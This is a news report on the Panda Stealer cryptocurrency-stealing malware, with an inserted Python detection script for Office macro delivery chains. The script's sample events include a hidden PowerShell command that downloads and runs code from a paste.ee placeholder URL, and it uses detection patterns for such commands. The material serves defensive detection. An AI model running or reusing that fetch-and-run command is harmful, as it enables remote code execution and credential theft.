A new type of malware, dubbed ‘Panda Stealer’ by researchers, is spreading through spam emails and malicious Discord links, and has its sights set firmly on your ever valuable cryptocurrency. According to Trend Micro, the phishing emails appear as business quote requests, with an XLSM file attached that’s loaded with malicious macros.
Panda Stealer arrives as an innocent-looking XLSM file whose macros, once enabled, download a "loader" that executes the main "stealer" application. Alternatively, an XLS file may be downloaded that contains a formula hiding a PowerShell command; this command contacts paste.ee, a Pastebin alternative, to download a further PowerShell command. Once running, Panda Stealer tries to detect keys, addresses, and other data associated with cryptocurrency transactions and wallets holding funds, including Dash, Bytecoin, Litecoin, and Ethereum. Right now we are unsure if the latest cryptocurrency, Chia, is affected. It will also attempt to steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s capable of taking screenshots of the infected computer and harvesting browser data such as cookies, passwords, and card details.
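The delivery chain above (an Office document spawning PowerShell that fetches a second stage from paste.ee) is something endpoint telemetry can catch. The following is an added detection example, not code from the article or from Trend Micro; it assumes process-creation events in a Sysmon-like shape with `parent`, `image` and `cmdline` fields, and the sample events and the paste.ee path in them are constructed.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('https://paste.ee/r/PLACEHOLDER'))\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
PASTE_HOST = re.compile(r"https?://(?:www\.)?(?:paste\.ee|pastebin\.com)/", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the list of indicators matched by one process-creation event."""
    parent, child = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    reasons = []
    if parent in OFFICE_APPS and child in SHELLS:
        reasons.append("office-spawned-shell")   # macro or formula launched a script host
    if child in {"powershell.exe", "pwsh.exe"} and HIDDEN_PS.search(cmd):
        reasons.append("hidden-powershell")      # -WindowStyle Hidden keeps the console off-screen
    if PASTE_HOST.search(cmd):
        reasons.append("paste-site-download")    # second stage pulled from a paste site
    return reasons

def scan(events):
    """Flag events: 'high' when an Office child also shows a second indicator, else 'medium'."""
    findings = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if not reasons:
            continue
        sev = "high" if "office-spawned-shell" in reasons and len(reasons) > 1 else "medium"
        findings.append({"index": i, "severity": sev, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Word or Excel spawning any script host is already worth a medium alert on most estates; the paste-site and hidden-window indicators raise it to high for the chain the article describes.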
Panda Stealer appears to be a variant of Collector Stealer, a cracked build of which is freely available online. While there’s no evidence yet of a particular criminal group behind Panda Stealer, Trend Micro was able to identify an IP address the malware uses for command and control. It led to a rented Shock Hosting virtual server, which has been suspended after being reported.
This may not be enough to quell the threat, however: VirusTotal found 264 similar files in its database, calling home to 140 C&C servers and downloaded from more than 10 sites, some of them on Discord, which may be in use for sharing the malware among criminals.